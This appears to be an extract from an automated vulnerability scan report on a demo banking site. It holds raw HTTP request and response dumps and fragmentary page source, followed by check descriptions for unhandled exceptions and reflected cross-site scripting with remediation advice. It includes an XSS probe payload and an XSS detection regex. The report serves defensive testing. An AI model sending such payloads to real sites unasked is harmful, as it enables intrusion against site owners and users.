<li><span id="terms_of_use_link">Terms of Use</span></li>
</ul>
</div>
<div class="span4">
<ul>
<li><span id
...TRUNCATED...
Page:
Request:
GET / HTTP/1.1
Accept: */*
Pragma: no-cache
X-Scan-Memo:
Category="Crawl"; SID="306E42D0F653E7CFA6720D7F15AE506B"; SessionType="ExternalAddedToCrawl";
79

Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:50:21 GMT
<!DOCTYPE html>
<html lang="en">
<head>
Placeholders.init({
});
</script>
}
});
</script>
</head>
<body>
<div>
</form>
</li>
<li>
</button>
</li>
</ul>
</div>
</div>
</div>
</div>
80
</div>
$(function() {
var path = "/";
});
});
</script>
<div class="row">
<ul id="pages-nav">
</ul>
</div>
</div>
$(function () {
var path = "/";
};
} else {
}
});
}
...TRUNCATED...
Page:
http://zero.webappsecurity.com:80/docs/architecture/
Request:
GET /docs/architecture/ HTTP/1.1
Referer: http://zero.webappsecurity.com/docs/architecture/index.html
Accept: */*
Pragma: no-cache
X-Scan-Memo: Category="Audit.Attack"; SID="330DD67AE1AC14BED34CAA2093BDE5A3";
PSID="629E4A1BA8397C370A60A994699A4485"; SessionType="PathTruncation"; CrawlType="None"; AttackType="None";
X-RequestManager-Memo: sid="53"; smi="0"; sc="1"; ID="ad7839ac-dfc5-4af1-b06c-dfc06499c1f6";
X-Request-Memo: ID="4cb9db41-1b9e-4edf-a44f-e1010a448491"; sc="1"; ThreadId="108";
Response:
HTTP/1.1 200 OK
81
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 08:01:57 GMT
ETag: W/"7656-1466008846000"
Architecture (7.0.70) - Table of Contents</title><meta name="author" content="Yoav Shapira"><style type="text/css"
media="print">
table {
text-align: left;
}
}
th {
text-align: left;
}

}
div.codeBox {
overflow: auto;
margin: 1em 0;
}
div.codeBox pre {
margin: 0;
padding: 4px;
border-radius: 5px;
/*
width: min-content;
*/
}
}

}
}
}
82

color: #fff;
}
padding: 5px 8px;
}
p.notice {
color: rgb(0, 51, 102);
padding: 0.5em;
}
href="index.html">Architecture Home</a></li><li><a href="http://wiki.apache.org/tomcat/FAQ">FAQ</a></li><li><a
href="index.html">Contents</a></li><li><a href="overview.html">Overview</a></li><li><a href="startup.html">Server
Startup</a></li><li><a href="requestProcess.html">Request Process</a></li></ul></td><td
width="80%" valign="top" align="left" id="mainBody"><h1>Table of Contents</h1><table border="0" cellspacing="0"
cellpadding="2"><tr><td bgcolor="#525D76"><font color="#ffffff" face="arial,helvetica.sanserif"><a
name="Preface"><strong>Preface</strong></a></font></td></tr><tr><td><blockquote>
<p>This section of the Tomc
...TRUNCATED...
Web Server Misconfiguration: Insecure Content-Type Setting

Page:
description
http://zero.webappsecurity.com:80/docs/appdev/sample/sample.war
Request:
GET /docs/appdev/sample/sample.war HTTP/1.1
Referer: http://zero.webappsecurity.com/docs/appdev/sample/
Accept: */*
Pragma: no-cache
X-Scan-Memo: Category="Crawl"; SID="C80E2163C3B058B420F9C08BCCC51C62";
PSID="B2C4DB9BD43BD67F563C5590060864D1"; SessionType="Crawl"; CrawlType="HTML"; AttackType="None";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="3e19822b-2222-489c-ab42-6a4446fc16ce";
X-Request-Memo: ID="686c8472-e5a7-47a0-b06b-7f9b9014ae51"; sc="1"; ThreadId="99";
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:54:13 GMT
ETag: W/"4606-1466008838000"
Content-Length: 51
Keep-Alive: timeout=5,
Connection:
Keep-Alive max=83
83
<truncated>application/x-zip-compressed
Page:
Request:
Accept: */*
Pragma: no-cache
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="903a6949-6ac8-489d-8c93-bb0ff0a74979";
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:51:28 GMT
ETag: W/"21684-1368929102000"
Keep-Alive: timeout=5, max=...TRUNCATED...
Informational
Insecure Deployment: Known Application Fingerprint
Page:
description
Request:
Referer: http://zero.webappsecurity.com/admin/WS_FTP.LOG
Accept: */*
Pragma: no-cache
X-Scan-Memo: Category="Audit.Attack"; SID="7080F83BF03970076F4C323DEDEA2BB0";
PSID="DC2EF0E7C935D7C47528CB0D2E9C1565"; SessionType="AuditAttack"; CrawlType="None"; AttackType="Search";
OriginatingEngineID="2625804f-5677-4b48-a279-2c736bdc6af0"; AttackSequence="0"; AttackParamDesc="%2fadmin%
2findex.html"; AttackParamIndex="0"; AttackParamSubIndex="0"; CheckId="3872"; Engine="Ws+Ftp+Log+Parser";
X-RequestManager-Memo: sid="39"; smi="0"; sc="1"; ID="e258385d-d077-4242-8c30-97be1bd5133e";
X-Request-Memo: ID="341c88c9-8040-448d-8fde-e08b06a8b771"; sc="1"; ThreadId="101";
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 08:06:36 GMT
Content-Language:
en-US
Keep-Alive:
timeout=5,
max=82
84

<!DOCTYPE html>
<html lang="en">
<head>
<title>Zero - Admin - Home</title>
Placeholders.init({
});
</script>
}
});
</script>
</head>
<body>
<div>
</form>
</li>
<li>
</button>
</li>
</ul>
</div>
</div>
</div>
</div>
$(function() {
var path = "/";
});
});
</script>
<div class="row">
85
<h2 class="board-header">Admin Home</h2>
</div>
</div>
<div class="row">
<div class="span3 well">
<ul class="nav nav-list">
<li class="active"><a href="/admin/index.html">Home</a></li>
<li class="divider"></li>
<li><a href="/admin/users.html">Users</a></li>
<li><a href="/admin/currencies.html">Currencies</a></li>
</ul>
</div>
<div class="span8"></div>
</div>
</div>
</div>
<div class="clearfix push"></div>
</div>
<div class="extra">
<div class="extra-inner">
<div class="row">
<div class="span4">
<ul>
<li><span id="download_webinspect_link">Download WebInspect</span></li>
</ul>
</div>
<div class="span4">
<ul>
<li><span id="terms_of_use_link">Terms of Use</span></li>
</ul>
</div>
<div class="span4">
<ul>
<li><span id
...TRUNCATED...
Web Server Misconfiguration: OPTIONS HTTP Method

Page:
description
Request:
OPTIONS / HTTP/1.1
Accept: */*
Pragma: no-cache
X-Scan-Memo: Category="Audit.Attack"; SID="D068159431A1203405281BA8855269F9";
PSID="5691FBE4D5310DEC25DD5EB591F3E328"; SessionType="AuditAttack"; CrawlType="None"; AttackType="None";
X-RequestManager-Memo: sid="47"; smi="0"; sc="1"; ID="f2f6015c-e92a-48fe-8a65-552e7459deeb";
X-Request-Memo: ID="60829663-f488-47fe-89c4-54906b05ae3e"; sc="1"; ThreadId="105";
Response:
HTTP/1.1 200 OK
Date: Mon,
10 Oct 2016 07:51:58 GMT
Server:
...TRUNCATED...
86
Best Practices
Compliance Failure: Missing Privacy Policy
Page:
description
Request:
GET / HTTP/1.1
Accept: */*
Pragma: no-cache
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:50:21 GMT
<!DOCTYPE html>
<html lang="en">
<head>
Placeholders.init({
});
</script>
}
});
</script>
</head>
<body>
87
<div>
</form>
</li>
<li>
</button>
</li>
</ul>
</div>
</div>
</div>
</div>
$(function() {
var path = "/";
});
});
</script>
<div class="row">
<ul id="pages-nav">
</ul>
</div>
</div>
$(function () {
var path = "/";
};
} else {
}
});
}
...TRUNCATED...
Privacy Violation: Autocomplete

Page:
description
Request:
GET / HTTP/1.1
Accept:
*/*
88
Accept: */*
Pragma: no-cache
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:50:21 GMT
...TRUNCATED...pull-right" style="padding-right: 20px">
</form>
</li>
<li>...TRUNCATED...
Page:
http://zero.webappsecurity.com:80/admin/currencies-add.html
Request:
GET /admin/currencies-add.html HTTP/1.1
Referer: http://zero.webappsecurity.com/admin/currencies.html
Accept: */*
Pragma: no-cache
X-Scan-Memo: Category="Crawl"; SID="1196B0700885BAA2AD346331C45F4326";
PSID="0CE5ABD84AD968C95357799ACE262859"; SessionType="Crawl"; CrawlType="HTML"; AttackType="None";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="ef7f353c-3e9d-4e37-b8a6-6fd4b408ac64";
X-Request-Memo: ID="6b4a2ec9-b1da-46b3-941c-55a17f95dd47"; sc="1"; ThreadId="98";
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:52:10 GMT
</form>
</li>
<li>...TRUNCATED...
Page:
http://zero.webappsecurity.com:80/online-banking.html
89
Page:
http://zero.webappsecurity.com:80/online-banking.html
Request:
GET /online-banking.html HTTP/1.1
Accept: */*
Pragma: no-cache
X-Scan-Memo: Category="Crawl"; SID="0961B4C9AB7ECE8F80F1EFC03677941C";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="2417e755-ecd4-476f-bab2-545851db8ef2";
X-Request-Memo: ID="3d024962-1255-43ef-accb-b591ed98e3ac"; sc="1"; ThreadId="96";
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:51:13 GMT
</form>
</li>
<li>...TRUNCATED...
Page:
http://zero.webappsecurity.com:80/admin/currencies.html
Request:
GET /admin/currencies.html HTTP/1.1
Accept: */*
Pragma: no-cache
X-Scan-Memo: Category="Crawl"; SID="0CE5ABD84AD968C95357799ACE262859";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="606cd668-ba36-4158-9d34-e877b5e4800e";
X-Request-Memo: ID="a38c463b-f21e-483b-b432-9225a2ec0089"; sc="1"; ThreadId="98";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798;JSESSIONID=AF5EC584
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:51:27 GMT
90

</form>
</li>
<li>...TRUNCATED...
Page:
Request:
Accept: */*
Pragma: no-cache
X-Scan-Memo: Category="Crawl"; SID="0CF01A02A1917FDBDF9FF1C597F1495C";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="e6f10847-378c-4724-90bc-ac074fc8b5b0";
X-Request-Memo: ID="b4bd0c76-c126-434f-9e68-75ad136db2b2"; sc="1"; ThreadId="100";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798;JSESSIONID=680DCF39
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:51:27 GMT
</form>
</li>
<li>...TRUNCATED...
Page:
http://zero.webappsecurity.com:80/index.html
Request:
GET /index.html HTTP/1.1
Accept: */*
Pragma: no-cache
X-Scan-Memo: Category="Crawl"; SID="8E73B3A63EFE2AADE20745A947151EB3";
PSID="306E42D0F653E7CFA6720D7F15AE506B"; SessionType="Crawl"; CrawlType="HTML"; AttackType="None";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="4a1b3643-8285-4215-a9a5-d69cb8fcec75";
X-Request-Memo: ID="c004c495-5a88-4e8a-986e-61fe5c86b0e3"; sc="1"; ThreadId="97";
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:51:12 GMT
*
Cache-Control: no-cache, max-age=0,
must-revalidate, no-store
91

</form>
</li>
<li>...TRUNCATED...
Page:
http://zero.webappsecurity.com:80/admin/users.html
Request:
GET /admin/users.html HTTP/1.1
Accept: */*
Pragma: no-cache
X-Scan-Memo: Category="Crawl"; SID="810BCB46E8C09C737ECDC561083681F4";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="7916c964-49d2-4e52-a3d3-5fc08c602847";
X-Request-Memo: ID="3811efb9-c4e3-4c9a-a336-fae774879fd7"; sc="1"; ThreadId="97";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798;JSESSIONID=400B9B5C
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:51:27 GMT
</form>
</li>
<li>...TRUNCATED...
Page:
Request:
GET /search.html?searchTerm=12345 HTTP/1.1
Accept: */*
Pragma: no-cache
X-Scan-Memo: Category="Crawl"; SID="4FB1E28C3A3C661502F583F3EA8F6277";
PSID="306E42D0F653E7CFA6720D7F15AE506B"; SessionType="Crawl"; CrawlType="Form"; AttackType="None";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="47285469-80aa-457f-b7a7-463caf37d211";
X-Request-Memo: ID="7c5328cd-1699-4712-b23e-8d196c922a1c"; sc="1"; ThreadId="98";
92
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:51:12 GMT
</form>
</li>
<li>...TRUNCATED...
Page:
http://zero.webappsecurity.com:80/sendFeedback.html
Request:
POST /sendFeedback.html HTTP/1.1
Referer: http://zero.webappsecurity.com/feedback.html
Content-Length: 91
Accept: */*
Pragma: no-cache
X-Scan-Memo: Category="Crawl"; SID="A8191E30A6A6D05B7ECBC975A580DB55";
PSID="EA0F5B4A7B2D5822D3AE6FEB6AC0B160"; SessionType="Crawl"; CrawlType="Form"; AttackType="None";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="ed4543ab-71ec-4a96-9342-8d2a2fcf61d6";
X-Request-Memo: ID="43763112-cd18-42cc-8477-6bef3d5757c9"; sc="2"; ThreadId="100";
name=Jason&email=John.Doe%40somewhere.com&subject=12345&comment=12345&submit=Send%20Message
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:52:07 GMT
</form>
</li>
<li>...TRUNCATED...
Page:
Request:
Accept: */*
Pragma: no-cache
Host:
Connection:
Keep-Alive
93
X-Scan-Memo: Category="Audit.Attack"; SID="B09C4D5CC22F10C01D9D84418780B93D";
X-RequestManager-Memo: sid="39"; smi="0"; sc="1"; ID="44b684c9-a38e-482f-b7ae-2cf445d55017";
X-Request-Memo: ID="797be3c0-690f-46e4-a978-485cb342bb23"; sc="1"; ThreadId="101";
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:51:11 GMT
</form>
</li>
<li>...TRUNCATED...
Page:
http://zero.webappsecurity.com:80/feedback.html
Request:
GET /feedback.html HTTP/1.1
Accept: */*
Pragma: no-cache
X-Scan-Memo: Category="Crawl"; SID="EA0F5B4A7B2D5822D3AE6FEB6AC0B160";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="de93f96d-9d6a-49c5-a412-bd229fb62e64";
X-Request-Memo: ID="904411d1-9183-4395-bae3-a54905ef5a19"; sc="1"; ThreadId="100";
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:51:25 GMT
</form>
</li>
<li>...TRUNCATED..."controls pictured">
<input type="text" id="name" name="name"
placeholder="Your Name" required="" tabindex="1"/>
<i class="icon-user"...TRUNCATED..."controls pictured">
<input type="text" id="email" name="email"
placeholder="Your email address" required=""
tabindex="2"/>
<i class="icon-envel...TRUNCATED..."controls
pictured">
94
<i class="icon-envel...TRUNCATED..."controls pictured">

<input type="text" id="subject" name="subject"
placeholder="Subject" required="" tabindex="3"/>
<i class="icon-flag"...TRUNCATED...
HTML5: CORS Functionality Abuse

Page:
description
http://zero.webappsecurity.com:80/resources/js/placeholders.min.js
Request:
GET /resources/js/placeholders.min.js HTTP/1.1
Accept: */*
Accept-Language: en-US,en;q=0.5
X-AscRawUrl: /resources/js/placeholders.min.js
Pragma: no-cache
X-Scan-Memo: Category="Crawl"; SID="511D6DB521E43A071D015EA7E62869D3";
PSID="306E42D0F653E7CFA6720D7F15AE506B"; SessionType="Crawl"; CrawlType="ScriptInclude"; AttackType="None";
OriginatingEngineID="00000000-0000-0000-0000-000000000000"; ThreadId="216"; ThreadType="JScriptEvent";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="6b3b66bc-ee7e-418f-a2ff-72824c2c8770";
X-Request-Memo: ID="ba10ebcc-36c7-4b8b-a7d2-a65d07b35ed5"; sc="1"; ThreadId="216";
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:50:31 GMT
ETag: W/"5615-1360116138000"
Last-Modified: Wed, 06 Feb 2013 02:02:18 GMT
Cache-Control: max-age=2678400
Expires: Thu, 10 Nov 2016 07:50:31 GMT
Content-Type: application/javascript;charset=UTF-8
var Placeholders=function(){var validTypes=["text","search","url","tel","email","password","number","textarea"],settings=
{live:false,hideOnFocus:false,className:"placeholderspolyfill",textColor:"#999",styleImportant:true},badKeys=
[37,38,39,40],interval,valueKeyDown,classNameRegExp=new RegExp("\\b"+settings.className+"\\b");function cursorToStart
(elem){var range;if(elem.createTextRange){range=elem.createTextRange();range.move("character",0);range.select()}else if
(elem.selectionStart){elem.focus();
elem.setSelectionRange(0,0)}}function focusHandler(){var type;if(this.value===this.getAttribute("placeholder"))if(!
settings.hideOnFocus)cursorToStart(this);else{this.className=this.className.replace
(classNameRegExp,"");this.value="";type=this.getAttribute("data-placeholdertype");if(type)this.type=type}}function blurHandler()
{var type;if(this.value===""){this.className=this.className+" "+settings.className;this.value=this.getAttribute
("placeholder");type=this.getAttribute("data-placeholdertype");if(type)this.type=
"text"}function submitHandler(){var inputs=this.getElementsByTagName
("input"),textareas=this.getElementsByTagName
("textarea"),numInputs=inputs.length,num=numInputs+textareas.length,element,placeholder,i;for(i=0;i<num;i+=1)
{element=i<numInputs?inputs[i]:textareas[i-numInputs];placeholder=element.getAttribute("placeholder");if
(element.value===placeholder)element.value=""}}function keydownHandler(event)
{valueKeyDown=this.value;return!(valueKeyDown===this.getAttribute("placeholder")&&badKeys.indexOf
(event.keyCode)>
-1)}function keyupHandler(){var type;if(this.value!==valueKeyDown){this.className=this.className.replace
(classNameRegExp,"");this.value=this.value.replace(this.getAttribute("placeholder"),"");type=this.getAttribute
("data-placeholdertype");if(type)this.type=type}if(this.value===""){blurHandler.call(this);cursorToStart(this)}}
function addEventListener(element,event,fn){if(element.addEventListener)return element.addEventListener
(event,fn.bind(element),false);if(element.attachEvent)return element.attachEvent("on"+
event,fn.bind(element))}function addEventListeners(element){if(!settings.hideOnFocus){addEventListener
(element,"keydown",keydownHandler);addEventListener(element,"keyup",keyupHandler)}addEventListener
(element,"focus",focusHandler);addEventListener(element,"blur",blurHandler)}function updatePlaceholders(){var
("textarea"),numInputs=inputs.length,num=numInputs+textareas.length,i,form,element,oldPlaceholder,newPlaceho
lder;
95
lder;
for(i=0;i<num;i+=1){element=i<numInputs?inputs[i]:textareas[inumInputs];newPlaceholder=element.getAttribute("placeholder");if(validTypes.indexOf(element.type)>-1)if
(newPlaceholder){oldPlaceholder=element.getAttribute("data-currentplaceholder");if(newPlaceholder!
==oldPlaceholder){if(element.value===oldPlaceholder||element.value===newPlaceholder||!element.value)
{element.value=newPlaceholder;element.className=element.className+" "+settings.className}if(!
oldPlaceholder){if(element.form){form=element.form;
if(!form.getAttribute("data-placeholdersubmit")){addEventListener
(form,"submit",submitHandler);form.setAttribute("data-placeholdersubmit","true")}}addEventListeners(element)}
element.setAttribute("data-currentplaceholder",newPlaceholder)}}}}function createPlaceholders(){var
("textarea"),numInputs=inputs.length,num=numInputs+textareas.length,i,element,form,placeholder;for
(i=0;i<num;i+=1){element=i<numInputs?inputs[i]:
textareas[i-numInputs];placeholder=element.getAttribute("placeholder");if(validTypes.indexOf(element.typ
...TRUNCATED...
Web Server Misconfiguration: Insecure Content-Type Setting
Page:
description
http://zero.webappsecurity.com:80/docs/appdev/sample/
Request:
GET /docs/appdev/sample/ HTTP/1.1
Accept: */*
Pragma: no-cache
X-Scan-Memo: Category="Crawl"; SID="B2C4DB9BD43BD67F563C5590060864D1";
X-Request-Memo: ID="aecfdea2-744b-43a1-a28c-4004b66050ab"; sc="2"; ThreadId="99";
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:53:20 GMT
ETag: W/"1852-1466008838000"
Keep-Alive: timeout=5, max...TRUNCATED...
Appendix (Check Descriptions)

Poor Error Handling: Unhandled Exception ( 742 )
Summary
Critical database server error message vulnerabilities were identified in the web application, indicating that an unhandled
exception was generated in your web application code. Unhandled exceptions are circumstances in which the application has
received user input that it did not expect and does not know how to handle. When successfully exploited, an attacker can gain
unauthorized access to the database by using the information recovered from seemingly innocuous error messages to pinpoint
flaws in the web application and to discover additional avenues of attack. Recommendations include designing and adding
consistent error-handling mechanisms that are capable of handling any user input to your web application, providing
meaningful detail to end-users, and preventing error messages that might provide information useful to an attacker from
being displayed.
96
Description
The most common cause of an unhandled exception is a failure to properly sanitize client-supplied data that is used in SQL
statements. They can also be caused by a bug in the web application's database communication code, a misconfiguration of
database connection settings, an unavailable database, or any other reason that would cause the application's database driver
to be unable to establish a working session with the server. The problem is not that web applications generate errors. All web
applications in their normal course of operation will at some point receive an unhandled exception. The problem lies not in
that these errors were received, but rather in how they are handled. Any error handling solution needs to be well-designed,
and uniform in how it handles errors. For instance, assume an attacker is attempting to access a specific file. If the request
returns an error File not Found, the attacker can be relatively sure the file does not exist. However, if the error returns
"Permission Denied," the attacker has a fairly good idea that the specific file does exist. This can be helpful to an attacker in
many ways, from determining the operating system to discovering the underlying architecture and design of the application.
The error message may also contain the location of the file that contains the offending function. This may disclose the
webroot's absolute path as well as give the attacker the location of application "include" files or database configuration
information. A fundamental necessity for a successful attack upon your web application is reconnaissance. Database server
error messages can provide information that can then be utilized when the attacker is formulating his next method of attack.
It may even disclose the portion of code that failed.
Be aware that this check is part of unknown application testing which seeks to uncover new vulnerabilities in both custom and
commercial software. Because of this, there are no specific patches or remediation information for this issue. Please note that
this vulnerability may be a false positive if the page it is flagged on is technical documentation relating to a database server.
Execution
The ways in which an attacker can exploit the conditions that caused the error depend on its cause. In the case of SQL
injection, the techniques that are used will vary from database server to database server, and even query to query. An indepth guide to SQL Injection attacks is available at http://download.hpsmartupdate.com/asclabs/sql_injection.pdf, or in the
SQL Injection vulnerability information, accessible via the Policy Manager. Primarily, the information gleaned from database
server error messages is what will allow an attacker to conduct a successful attack after he combines his various findings.
Implication
The severity of this vulnerability depends on the reason that the error message was generated. In most cases, it will be the
result of the web application attempting to use an invalid client-supplied argument in a SQL statement, which means that SQL
injection will be possible. If so, an attacker will at least be able to read the contents of the entire database arbitrarily.
Depending on the database server and the SQL statement, deleting, updating and adding records and executing arbitrary
commands may also be possible. If a software bug or bug is responsible for triggering the error, the potential impact will vary,
depending on the circumstances. The location of the application that caused the error can be useful in facilitating other kinds
of attacks. If the file is a hidden or include file, the attacker may be able to gain more information about the mechanics of the
web application, possibly even the source code. Application source code is likely to contain usernames, passwords, database
connection strings and aids the attacker greatly in discovering new vulnerabilities.
Fix
For Development:
From a development perspective, the best method of preventing problems from arising from database error messages is to
adopt secure programming techniques that prevent problems that might arise from an attacker discovering too much
information about the architecture and design of your web application. The following recommendations can be used as a basis
for that.
Stringently define the data type (for instance, a string, an alphanumeric character, etc) that the application will accept.
Use what is good instead of what is bad. Validate input for improper characters.
Do not display error messages to the end user that provide information (such as table names) that could be utilized in
orchestrating an attack.
Define the allowed set of characters. For instance, if a field is to receive a number, only let that field accept numbers.
Define the maximum and minimum data lengths for what the application will accept.
Specify acceptable numeric ranges for input.
For Security Operations:
The following recommendations will help in implementing a secure database protocol for your web application. Be advised
each database has its own method of secure lock down.
97
ODBC Error Messaging: Turn off ODBC error messaging in your database server. Never display raw ODBC or other
errors to the end user. See Removing Detailed Error Messages below, or consult your database server's documentation,
for more information.
Uniform Error Codes: Ensure that you are not inadvertently supplying information to an attacker via the use of
inconsistent or "conflicting" error messages. For instance, don't reveal unintended information by utilizing error messages
such as Access Denied, which will also let an attacker know that the file he seeks actually exists. Have consistent
terminology for files and folders that do exist, do not exist, and which have read access denied.
Informational Error Messages: Ensure that error messages do not reveal too much information. Complete or partial
paths, variable and file names, row and column names in tables, and specific database errors should never be revealed
to the end user. Remember, an attacker will gather as much information as possible, and then add pieces of seemingly
innocuous information together to craft a method of attack.
Proper Error Handling: Utilize generic error pages and error handling logic to inform end users of potential problems.
Do not provide system information or other data that could be utilized by an attacker when orchestrating an attack.
Stored Procedures: Consider using stored procedures. They require a very specific parameter format, which makes
them less susceptible to SQL Injection attacks.
Database Privileges: Utilize a least-privileges scheme for the database application. Ensure that user accounts only
have the limited functionality that is actually required. All database mechanisms should deny access until it has been
granted, not grant access until it has been denied.
For QA:
In reality, simple testing can usually determine how your web application will react to different input errors. More expansive
testing must be conducted to cause internal errors to gauge the reaction of the site. If the unhandled exception occurs in a
piece of in-house developed software, consult the developer. If it is in a commercial package, contact technical support.
The best course of action for QA associates to take is to ensure that the error handling scheme is consistent. Do you receive a
different type of error for a file that does not exist as opposed to a file that does? Are phrases like "Permission Denied" utilized
which could reveal the existence of a file to an attacker?
Reference
HP:
HP Application Security Center SQL Injection Whitepaper
Apache:
Apache HTTP Server Version 1.3 Custom Error Responses
Apache HTTP Server Version 2.0 Custom Error Responses
Microsoft:
Description of Microsoft Internet Information Services (IIS) 5.0 and 6.0 status codes
Classifications
CWE-388: Error Handling

http://cwe.mitre.org/data/definitions/388.html
CWE-497: Exposure of System Data to an Unauthorized Control Sphere
CWE-200: Information Exposure
Kingdom: Errors
http://www.hpenterprisesecurity.com/vulncat/en/vulncat/intro.html
98
Cross-Site Scripting: Reflected ( 5649 )

Summary
_
Cross-Site Scripting vulnerability found in Get parameter question. The following attack uses plain encoding:
<sCrIpT>alert(74867)</sCrIpT>
Cross-Site Scripting vulnerabilities were verified as executing code on the web application. Cross-Site Scripting occurs when
dynamically generated web pages display user input, such as login information, that is not properly validated, allowing an
attacker to embed malicious scripts into the generated page and then execute the script on the machine of any user that
views the site. In this instance, the web application was vulnerable to an automatic payload, meaning the user simply has to
visit a page to make the malicious scripts execute. If successful, Cross-Site Scripting vulnerabilities can be exploited to
manipulate or steal cookies, create requests that can be mistaken for those of a valid user, compromise confidential
information, or execute malicious code on end user systems. Recommendations include implementing secure programming
techniques that ensure proper filtration of user-supplied data, and encoding all user supplied data to prevent inserted scripts
being sent to end users in a format that can be executed.
Execution
View the attack string included with the request to check what to search for in the response. For instance, if "(javascript:alert
('XSS')" is submitted as an attack (or another scripting language), it will also appear as part of the response. This indicates
that the web application is taking values from the HTTP request parameters and using them in the HTTP response without
first removing potentially malicious data.
99
Implication
XSS can generally be subdivided into two categories: stored and reflected attacks. The main difference between the two is in
how the payload arrives at the server. Stored attacks are just that...in some form stored on the target server, such as in a
database, or via a submission to a bulletin board or visitor log. The victim will retrieve and execute the attack code in his
browser when a request is made for the stored information. Reflected attacks, on the other hand, come from somewhere else.
This happens when user input from a web client is immediately included via server-side scripts in a dynamically generated
web page. Via some social engineering, an attacker can trick a victim, such as through a malicious link or "rigged" form, to
submit information which will be altered to include attack code and then sent to the legitimate server. The injected code is
then reflected back to the user's browser which executes it because it came from a trusted server. The implication of each
kind of attack is the same.
The main problems associated with successful Cross-Site Scripting attacks are:
Account hijacking - An attacker can hijack the user's session before the session cookie expires and take actions with the
privileges of the user who accessed the URL, such as issuing database queries and viewing the results.
Malicious script execution - Users can unknowingly execute JavaScript, VBScript, ActiveX, HTML, or even Flash content
that has been inserted into a dynamically generated page by an attacker.
Worm propagation - With Ajax applications, XSS can propagate somewhat like a virus. The XSS payload can
autonomously inject itself into pages, and easily re-inject the same host with more XSS, all of which can be done with no
hard refresh. Thus, XSS can send multiple requests using complex HTTP methods to propagate itself invisibly to the user.
Information theft - Via redirection and fake sites, attackers can connect users to a malicious server of the attacker's
choice and capture any information entered by the user.
Denial of Service - Often by utilizing malformed display requests on sites that contain a Cross-Site Scripting vulnerability,
attackers can cause a denial of service condition to occur by causing the host site to query itself repeatedly .
Browser Redirection - On certain types of sites that use frames, a user can be made to think that he is in fact on the
original site when he has been redirected to a malicious one, since the URL in the browser's address bar will remains the
same. This is because the entire page isn't being redirected, just the frame in which the JavaScript is being executed.
Manipulation of user settings - Attackers can change user settings for nefarious purposes.
For more detailed information on Cross-Site Scripting attacks, see the HP Cross-Site Scripting whitepaper.
Fix
For Development:
Cross-Site Scripting attacks can be avoided by carefully validating all input, and properly encoding all output. When validating
user input, verify that it matches the strictest definition of valid input possible. For example, if a certain parameter is supposed
to be a number, attempt to convert it to a numeric data type in your programming language.
PHP: intval("0".$_GET['q']);
ASP.NET: int.TryParse(Request.QueryString["q"], out val);
The same applies to date and time values, or anything that can be converted to a stricter type before being used. When
accepting other types of text input, make sure the value matches either a list of acceptable values (white-listing), or a strict
regular expression. If at any point the value appears invalid, do not accept it. Also, do not attempt to return the value to the
user in an error message.
Most server side scripting languages provide built in methods to convert the value of the input variable into correct, noninterpretable HTML. These should be used to sanitize all input before it is displayed to the client.
PHP: string htmlspecialchars (string string [, int quote_style])
ASP.NET: Server.HTMLEncode (strHTML String)
When reflecting values into JavaScript or another format, make sure to use a type of encoding that is appropriate. Encoding
data for HTML is not sufficient when it is reflected inside of a script or style sheet. For example, when reflecting data in a
JavaScript string, make sure to encode all non-alphanumeric characters using hex (\xHH) encoding.
If you have JavaScript on your page that accesses unsafe information (like location.href) and writes it to the page (either with
document.write, or by modifying a DOM element), make sure you encode data for HTML before writing it to the page.
JavaScript does not have a built-in function to do this, but many frameworks do. If you are lacking an available function,
something like the following will handle most cases:
s = s.replace(/&/g,'&').replace(/"/i,'"').replace(/</i,'<').replace(/>/i,'>').replace(/'/i,''')
Ensure that you are always using the right approach at the right time. Validating user input should be done as soon as it is
received. Encoding data for display should be done immediately before displaying it.
100
Server-side encoding, where all dynamic content is first sent through an encoding function where Scripting tags will be
replaced with codes in the selected character set, can help to prevent Cross-Site Scripting attacks.
Many web application platforms and frameworks have some built-in support for preventing Cross-Site Scripting. Make sure
that any built-in protection is enabled for your platform. In some cases, a misconfiguration could allow Cross-Site Scripting. In
ASP.NET, if a page's EnableViewStateMac property is set to False, the ASP.NET view state can be used as a vector for CrossSite Scripting.
An IDS or IPS can also be used to detect or filter out XSS attacks. Below are a few regular expressions that will help detect
Cross-Site Scripting.
Regex for a simple XSS attack:
/((\%3C) <)((\%2F) \/)*[a-z0-9\%]+((\%3E) >)/ix
